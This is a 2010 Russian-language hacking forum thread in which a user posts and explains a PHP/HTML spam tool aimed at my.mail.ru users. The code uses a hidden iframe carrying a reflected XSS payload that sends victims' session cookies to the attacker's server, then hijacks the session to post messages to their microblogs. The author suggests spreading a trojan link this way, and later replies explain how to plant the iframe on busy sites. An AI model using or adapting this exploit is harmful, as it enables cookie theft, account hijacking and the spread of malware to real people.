Спамер my.mail.ru с помощью XSS и iframe ру трафа

Discussion in 'Социальные сети' started by Sin3v_2, 4 Oct 2010.

  1. Sin3v_2

    Sin3v_2 Banned

    Joined:
    22 Aug 2010
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    [​IMG]

    Написал тут не большой спамер с помощью атаки CRSF (Сross Site Request Forgery — «Подделка межсайтовых запросов»).
    Требуется только XSS Mail.ru и РУ iframe трафик.


    Описание:
    С помощью XSS Mail.ru крадуться cookie
    обрезается Mpop и его значение от мусара
    далее cookie вносятся в cURL чтобы загрузилась страница пользователя
    с исходника страницы парсятся два важных значения mna,mnb без них сообщения не шлются
    потом составляется ссылка из месаги,mna,mnb и срабатывает GET запрос отсылая нашу месагу в микроблог юзера)

    Так вот если толкнуть этот файл в iframe какого-нибудь посещаемого ру сайта, то проспамится ваша месага хорошо) Ченить типо "Ваххахах коры http://troyan.com зацените все" и в Мой Мире же много друзей и вылезает у всех, как бы одна месага многих зацепит))


    Вообщем вот код:
    Code:
    <?
    $message = 'Hello World!';
    $xss = 'http://love.mail.ru/support.phtml?s_post=xMPkdBsopK2S2uzEJ0CBetWAyGRbWMLd&query=';
    $host = 'http://localhost';
    function mpop_salt($mpop_s) { 
        $p1 = strpos($mpop_s, 'Mpop=');
        $p2 = strpos($mpop_s, ';', $p1);
        $mpop = substr($mpop_s, $p1, $p2-$p1);
        return $mpop;
    }
    function GetSource($cookie) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,"http://my.mail.ru");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_GET, 1);
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        $zz = curl_exec($ch);
        curl_close($ch);
        return $zz;
    }
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
    <title></title>
    </head>
    <body>
    <?
    if (!isset($_GET['id'])) {
    ?>
    <iframe style="display:none" src='<? echo($xss); ?>%22%3E%3Cscript+type=%22text/javascript%22%3Elocation.href+=+%22<? echo($host); ?>/index.php?id=%22+%2B+document.cookie%3C%2Fscript%3E>'></iframe>
    <?
    } else {
        $id = $_GET['id'];
        $cookie = mpop_salt($id);
    	$text = GetSource($cookie);
    	$p1 = strpos($text, 'name="mna" value="')+18;
    	$p2 = strpos($text, '">', $p1);
    	$mna = substr($text, $p1, $p2-$p1);
    	$p1 = strpos($text, 'name="mnb" value="')+18;
    	$p2 = strpos($text, '">', $p1);
    	$mnb = substr($text, $p1, $p2-$p1);
    	?>
        <meta http-equiv='refresh' content='0;url=http://my.mail.ru/cgi-bin/my/ajax?ajax_call=1&func_name=perl_send_micropost&data=["<? echo($message); ?>", 0, 0, 1, "<? echo($mna); ?>", "<? echo($mnb); ?>", ""]'>
        <?
    }
    ?>
    </body>
    </html>
    А лучше скачать файл, а то ачат пробелы ставит.
    Видео-Ролик как работает спамер) 46Mb




    P/S
    Вот теперь можно на фейки гнать траф) А то надоели этими брут акками торгуют которые каждый день от и до спамят и еще такие селлеры пишут "у меня ЧИСТЫЕ акки".
     
    #1 Sin3v_2, 4 Oct 2010
    Last edited: 5 Oct 2010
  2. L.A.V

    L.A.V Member

    Joined:
    1 Sep 2009
    Messages:
    10
    Likes Received:
    10
    Reputations:
    0
    довольно интересно
     
  3. bigest

    bigest Banned

    Joined:
    22 Jul 2010
    Messages:
    0
    Likes Received:
    7
    Reputations:
    0
    сделай по подробнее.. у понял так..

    смотри копирую текст в nah.html

    Далее захожу на эту страницу,кидает:

    Code:
    http://my.mail.ru/cgi-bin/my/ajax?ajax_call=1&func_name=perl_send_micropost&data=[%22%3C?%20echo($message);%20?%3E%22,%200,%200,%201,%20%22%3C?%20echo($mna);%20?%3E%22,%20%22%3C?%20echo($mnb);%20?%3E%22,%20%22%22]
    И на странице пишет:
    Code:
    ["AjaxResponse","OK","micropost_ratelimit_exceeded","",0,""]
    Правильно? это же после этого спам по листу друзей пошел или как?

    Как мне аккаунт взломать,что нужно сделать?
     
  4. Sin3v_2

    Sin3v_2 Banned

    Joined:
    22 Aug 2010
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Не надо нечего выкавыривать)
    берешь файл тот с архива index.php переименовываешь как тебе понравится но если переименуешь не забудь тут тоже поменять
    <iframe style="display:none" src='<? echo($xss); ?>%22%3E%3Cscript+type=%22text/javascript%22%3Elocation.href+=+%22<? echo($host); ?>/index.php?id=%22+%2B+document.cookie%3C%2Fscript%3 E>'></iframe>

    потом берешь этот файл уже залитый на сайт выглядит типо http://127.128.129.130/files/index.php
    и толкаешь куданибудь на юкоз можно в виде
    <iframe src="http://127.128.129.130/files/index.php" style="display:none"></iframe>

    Главно что бы на твоем http://127.128.129.130 была поддержка php и cURL

    Залил видео смотрим в топике
     
  5. HeaVeNSeR

    HeaVeNSeR Member

    Joined:
    3 Dec 2008
    Messages:
    176
    Likes Received:
    11
    Reputations:
    1
    тема интересная)...
    жаль,ХССку спалят и пофиксят,наверн ;)
     
  6. stasik

    stasik Member

    Joined:
    6 Aug 2009
    Messages:
    22
    Likes Received:
    10
    Reputations:
    6
    смысл тему палить? даже неотплюсуют, а результат будет один - увелечение безопасности майла.ру,
    если за это возьмётся грамотный человек, кое что переделает по своему... привяжут куки к ип и всё
     
  7. Sin3v_2

    Sin3v_2 Banned

    Joined:
    22 Aug 2010
    Messages:
    3
    Likes Received:
    4
    Reputations:
    0
    Куки к ипу точно не привяжут, незнаю почему не привязывают значит есть причина)
    Само чо они могут изменить это ссылку в алерт толкнуть или эти значения mna,mnb сделать чтобы генерировались на месте ну типо как авторизация на сайте Skype, там вообще хз как она работает. Это так догадки) И это все обойти можно.
     
  8. [Isusik..]

    [Isusik..] New Member

    Joined:
    13 Nov 2008
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    что то не работает уже хсска наверно (
    а жаль (
     
  9. spameronax

    spameronax New Member

    Joined:
    14 Aug 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    неплохо земляк
     
Loading...